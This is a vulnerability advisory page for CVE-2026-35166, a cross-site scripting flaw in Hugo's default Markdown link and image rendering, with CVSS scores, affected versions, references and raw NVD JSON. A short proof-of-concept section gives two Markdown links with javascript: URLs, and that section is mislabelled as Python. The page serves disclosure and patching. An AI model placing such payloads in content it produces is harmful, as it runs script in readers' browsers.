CVE-2026-35166

Description

Hugo is a static site generator. From 0.60.0 to before 0.159.2, links and image links in the default markdown to HTML renderer are not properly escaped. Hugo users who trust their Markdown content or have custom render hooks for links and images are not affected. This vulnerability is fixed in 0.159.2.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:gohugo:hugo:*:*:*:*:*:linux:*:* - VULNERABLE

cpe:2.3:a:gohugo:hugo:*:*:*:*:*:macos:*:* - VULNERABLE

cpe:2.3:a:gohugo:hugo:*:*:*:*:*:windows:*:* - VULNERABLE

Hugo >= 0.60.0, < 0.159.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-35166
# Malicious Markdown content to be rendered by Hugo

# Example 1: XSS via javascript protocol in link
[Click Me](javascript:alert('CVE-2026-35166'))

# Example 2: XSS via image link
[![Image](javascript:alert('CVE-2026-35166'))](http://example.com)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35166
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35166
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35166/
[4] VulDB https://vuldb.com/cve/CVE-2026-35166
[5] https://github.com/gohugoio/hugo/security/advisories/GHSA-mcv8-8m8x-48pg

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35166", "sourceIdentifier": "[email protected]", "published": "2026-04-06T18:16:43.060", "lastModified": "2026-04-20T18:34:45.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hugo is a static site generator. From 0.60.0 to before 0.159.2, links and image links in the default markdown to HTML renderer are not properly escaped. Hugo users who trust their Markdown content or have custom render hooks for links and images are not affected. This vulnerability is fixed in 0.159.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gohugo:hugo:*:*:*:*:*:linux:*:*", "versionStartIncluding": "0.60.0", "versionEndExcluding": "0.159.2", "matchCriteriaId": "D9199A95-23E0-43BE-8F0C-C521A7455819"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gohugo:hugo:*:*:*:*:*:macos:*:*", "versionStartIncluding": "0.60.0", "versionEndExcluding": "0.159.2", "matchCriteriaId": "417A61AB-2317-42C3-9961-81C1DFB7C6DB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gohugo:hugo:*:*:*:*:*:windows:*:*", "versionStartIncluding": "0.60.0", "versionEndExcluding": "0.159.2", "matchCriteriaId": "8576A7CA-0166-4BC1-B2C8-CB53588E4CAC"}]}]}], "references": [{"url": "https://github.com/gohugoio/hugo/security/advisories/GHSA-mcv8-8m8x-48pg", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}